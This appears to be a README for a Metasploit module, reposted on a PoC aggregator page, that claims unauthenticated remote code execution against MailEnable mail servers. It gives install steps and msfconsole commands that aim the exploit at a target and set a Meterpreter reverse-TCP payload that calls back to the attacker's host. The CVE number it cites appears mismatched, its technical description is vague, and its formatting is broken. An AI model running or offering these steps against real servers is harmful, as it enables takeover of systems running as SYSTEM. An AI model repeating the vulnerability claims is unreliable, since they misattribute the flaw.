来源

关联漏洞

描述

Metasploit module for MailEnable CVE-2022-36934 authentication bypass RCE

介绍

# MailEnable CVE-2022-36934 Exploit Module

![Metasploit](https://img.shields.io/badge/Metasploit-Compatible-red)
![License](https://img.shields.io/badge/License-MIT-blue)

Metasploit module for MailEnable's authentication bypass vulnerability (CVE-2022-36934), leading to remote code execution.

## 📌 Features
- Exploits MailEnable's improper input sanitization in SMTP/POP3
- Supports both x86 and x64 Windows targets
- No user interaction required (auto-triggers via crafted email)
- Works against MailEnable versions < 10.40

## 🚀 Installation
1. Copy to Metasploit modules directory:
   ```bash
   cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/

2. Reload modules in msfconsole:

  reload_all

4. Usage:

  use exploit/windows/smtp/mailenable_authbypass_rce
  set RHOSTS <target_ip>
  set LHOST <your_ip>
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  exploit



  🎯 Tested Against:

  MailEnable Professional	10.25	Windows Server 2019
  MailEnable Enterprise	10.30	Windows Server 2016

📝 Technical Details:

  Vulnerability: Authentication bypass via SQLi-like syntax in SMTP/POP3

  Attack Vector: Network (ports 25/110)

  Privileges: Runs as MailEnable service account (often SYSTEM)
  
⚠️ Legal Disclaimer:

This tool is for authorized testing only. Never use against systems you don't own or have explicit permission to test.

文件快照

 [4.0K]  /data/pocs/ead9bfa232b8357f1507110c9a887e35107d016b
└── [1.4K]  README.md

0 directories, 1 file

备注